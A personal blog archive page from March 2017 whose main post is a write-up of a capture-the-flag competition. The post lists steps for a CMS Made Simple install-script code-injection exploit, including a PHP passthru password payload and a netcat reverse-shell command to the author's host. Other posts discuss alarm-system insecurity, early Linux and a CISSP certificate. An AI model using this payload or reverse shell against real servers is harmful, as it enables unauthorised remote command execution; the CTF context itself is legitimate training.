Kilala.nl - Personal website of Thomas Sluyter

Unimportant background
Login
  RSS feed

About me

Blog archives

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

2005

2004

> Weblog

> Sysadmin articles

> Maths teaching

<< 2 / 2017 4 / 2017 >>

A wonderful day at CTF036 2017

2017-03-31 22:40:00

Presenting at CTF036 about RF hacking

Today was a blast! In what has become an annual tradition, Ultimum organised the third edition of their CTF036 event

A big change since last year: I started the day not by listening, but by talking! I presented the "My first RH hack" talk, which I'd given last year at IT Gilde. In it, I outlined what I'd learned hacking the Kerui alarm system. The slides to my presentation can be found here. Reactions from the attendants were generally positive: apparently my presentation style was well-received and I'd matched the content's level to that of the crowd. 

I was followed by John Kroon, who detailed a vulnerability assessment framework he'd built and Sijmen Ruwhof. The latter has recently gained some fame with his public outcry regarding the Dutch voting process and the software involved. It's quite the kerfuffle!

The CTF was quite a challenge! Like last year we were presented with an A4 sized description of the target, which basically hinted at a domainname, a mail server and a DNS server. After some initial confusion about IP ranges, I got off to a start. DNSenum confirmed three hosts in one network, with two others in a deeper subnet. The three servers out in the open are respectively a web server, the mail server and a Windows host with data shares. 

Like last year, I started with the web server. This runs CMS-Made-Simple v1.1.2. Sploitsearch did not list anything that seemed immediately useful, but Nikto did show me that various useful subdirs were found, including /admin and /install. John's colleague Jordy quickly found something interesting, which relies upon /install not being deleted: CMS-MS PHP Code Injection vulnerability

By this time a few competitors had discovered something I'd missed: the Windows box had a freely accessible share with three of the sought-after accounts, worth 30 points. Of the twenty-odd competitors, three had 30 points within the first hour. 

John and I continued poking at Jordy's suggestion, with Rik across the tables following suit. I was the first to get it to work, after Jordy spurred me on. The basic process was indeed as outlined in the linked article:

  1. Setup MySQL on my own sytem.
  2. Make a random, empty database and grant a new account (e.g. "test") full access to the database. 
  3. The password to the user account must be: '.passthru($_GET['command']);exit;//
  4. The database must be accessible remotely (change mysql.cnf and use the appropriate GRANT, more info here).
  5. At this point you use the setup tool in /install to point CMS-MS at your own database. Uncheck the boxes in step #4. 
  6. Once you've finished the setup tool, the config.php file contains the password above, which enables you to call the base URL with an added "?command=" where you can enter any arbitrary command for the host OS. 
  7. I quickly found that the target host had /bin/netcat installed, so I could run http://www.thesmartcloud.nl/?command=/bin/netcat -e /bin/bash 172.100.23.74 443
  8. This connects to my listening netcat on my port 443. Ace!

Netcat gave me a shell as user "www-data". Poking around the host I found no abusable SUID executables, no sudo rules and no obvious methods for privesc. I did manage to grab /home/accounts.txt which contains seven accounts. Thus, for about half an hour, I was in the gleeful position of being 1st with 70 points :D 

While I kept poking at the web server and later moved on to the RoundCube/Dovecot box, I also helped John and Rik while they tried to get the CMS-MS exploit to work. Word got around quickly and a few of the guys who already had 30pts moved up to 100, with about 40mins left. I tried hard, but I couldn't find a way to score more points, so I ended up in 5th place today. 

Ultimum's Michael informed us that the maximum score attainable was 500pts, so basically none of us had scratched beyond the surface by 16:00. As I said: they made it quite the challenge! It was a lot of fun!


kilala.nl tags: , ,

View or add comments (curr. 0)

More attention for bad security of home alarms

2017-03-31 19:49:00

Cover of the April CT magazine

You may recall my pen-test / security review of the Kerui alarm system, where I found that a replay attack is tremendously easy

Turns out that more people are catching on! One of the audience members at my presentation today informed me that the April issue of C'T Magazine has a cover story about this exact topic: unsafe home alarm systems. Awesome! Can't wait to read it!


kilala.nl tags: ,

View or add comments (curr. 0)

Linux in the way-way back machine!

2017-03-27 09:01:00

InfoMagic Linux box from the nineties

RedHat just posted a wonderful article to LinkedIn, that filled me with nostalgia: Test-drive Linux from 1993-2001.

My first experience with Linux was at the Hogeschool Utrecht, in Jaap's class on modern-day operating systems and networks. I've long forgotten his surname, but Jaap was always very enthusiastic about Linux and about what open source might mean for our future. In the labs, we set up Linux boxen and hooked up modems so we could make our own dial-in lines to school. None of us really knew what we were doing, just dicking around and learning as we went. It was a great experience! :)

I wanted to keep on working with Linux outside of our labs, so I hopped down to *) in Utrecht. I've forgotten what they were called at the time... Was it Donner? I dunno, we always called them "sterretje-hekje" (star-brace) for their logo. They were the largest bookstore in the center of Utrecht, and their basement was dedicated to academics. Among their endless stacks of IT books I found my treasured New Hackers Dictionary (the Jargon file) and the famed InfoMagic Linux Developer's Resource CD-ROM boxset (pictured left). 

Trying the various CDs, I settled on RedHat 5.0 which ran pretty nicely on my Compaq Pressario AIO. Mmmm, 450MB hard drive, 4x CD-ROM and 16MB of RAM! ;) 

Right before graduating from HU, one of the lab technicians gifted me a Televideo 950 dumb terminal. We'd used those in the OS-9 labs, while we learned assembly on the MC68000. I don't recall what hardware we used there... It was two students to a nondescript aluminum box, wired through token ring to a bright orange OS-9 server. I still wonder what server was!

Wow... Hard to believe it's already been eighteen years!


kilala.nl tags: , ,

View or add comments (curr. 2)

CISSP certs now come with a spiffy giftbox

2017-03-01 17:10:00

When I renewed my CISSP status a few weeks ago, I knew I'd be getting a new membership card in the mail. What I didn't expect however, was to get a swanky giftbox with a nice presentation of the cert, card and a pin! Looking classy there, ISC2 :)


kilala.nl tags: ,

View or add comments (curr. 0)

<< 2 / 2017 4 / 2017 >>